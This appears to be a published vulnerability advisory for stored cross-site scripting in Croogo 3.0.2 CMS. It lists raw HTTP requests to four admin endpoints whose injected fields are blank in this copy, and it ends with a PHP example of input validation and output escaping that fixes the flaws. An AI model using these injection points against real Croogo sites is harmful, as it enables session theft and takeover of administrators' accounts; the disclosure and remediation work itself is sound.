Croogo 3.0.2 Cross Site Scripting


# Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 06/12/2021
# Exploit Author: Enes Özeser
# Vendor Homepage: https://croogo.org/
# Software Link: https://downloads.croogo.org/v3.0.2.zip
# Version: 3.0.2
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3

==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <==

POST /admin/file-manager/attachments/add HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730
Content-Length: 923
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/file-manager/attachments/add
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_method"

POST
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_csrfToken"

c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type:

Enes Ozeser
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_Token[fields]"

16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_Token[unlocked]"

-----------------------------114221148012003093972656004730--

==> ‘title’ Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <==

POST /admin/taxonomy/types/edit/5 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 590
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/taxonomy/types/edit/5
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
title=&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0&
comment_approve=1&comment_spam_protection=0&comment_captcha=0&params=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1&
format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply

==> ‘title’ Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <==

POST /admin/blocks/regions/edit/3 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 336
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/blocks/regions/edit/3
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
title=&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply

==> ‘title’ Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <==

POST /admin/file-manager/attachments/edit/20 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 363
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/file-manager/attachments/edit/20
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
title=&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply
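
An added example, not taken from the original advisory or from Croogo's code base: the two controls that close the four findings above, applied to the fields the requests carry (the multipart part's Content-Type and the stored 'title'). The function names safeMimeType() and e(), the sample rows and the temporary file are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

/**
 * Return a MIME type that is safe to store for an uploaded file.
 * The type sent in the multipart part header is client controlled, so it
 * is accepted only when it matches the RFC 6838 type/subtype grammar;
 * anything else is replaced by a type sniffed from the file's bytes.
 * (Hypothetical helper, not a Croogo or CakePHP function.)
 */
function safeMimeType(string $clientType, string $tmpPath): string
{
    $name = '[A-Za-z0-9][A-Za-z0-9!#$&^_.+-]{0,126}';
    if (preg_match('~\A' . $name . '/' . $name . '\z~', $clientType) === 1) {
        return strtolower($clientType);
    }
    $sniffed = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    return is_string($sniffed) ? $sniffed : 'application/octet-stream';
}

/** Escape a stored value for an HTML text node or a quoted attribute. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input: markup supplied where a MIME type or a
// title is expected, next to a well-formed row for comparison.
$tmp = tempnam(sys_get_temp_dir(), 'upl');
file_put_contents($tmp, "Enes Ozeser\n");
$markup = '<em>not a plain value</em>';

$rows = [
    ['title' => 'Report "Q4"', 'mime' => safeMimeType('text/plain', $tmp)],
    ['title' => $markup,       'mime' => safeMimeType($markup, $tmp)],
];

// Every stored field is escaped at the point of output, including the
// MIME type that was already validated on the way in.
foreach ($rows as $row) {
    printf(
        "<tr><td title=\"%s\">%s</td><td>%s</td></tr>\n",
        e($row['title']),
        e($row['title']),
        e($row['mime'])
    );
}
unlink($tmp);
```

In CakePHP templates the framework's `h()` helper performs the same escaping as `e()` here. The block needs PHP's fileinfo extension for the sniffing fallback.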
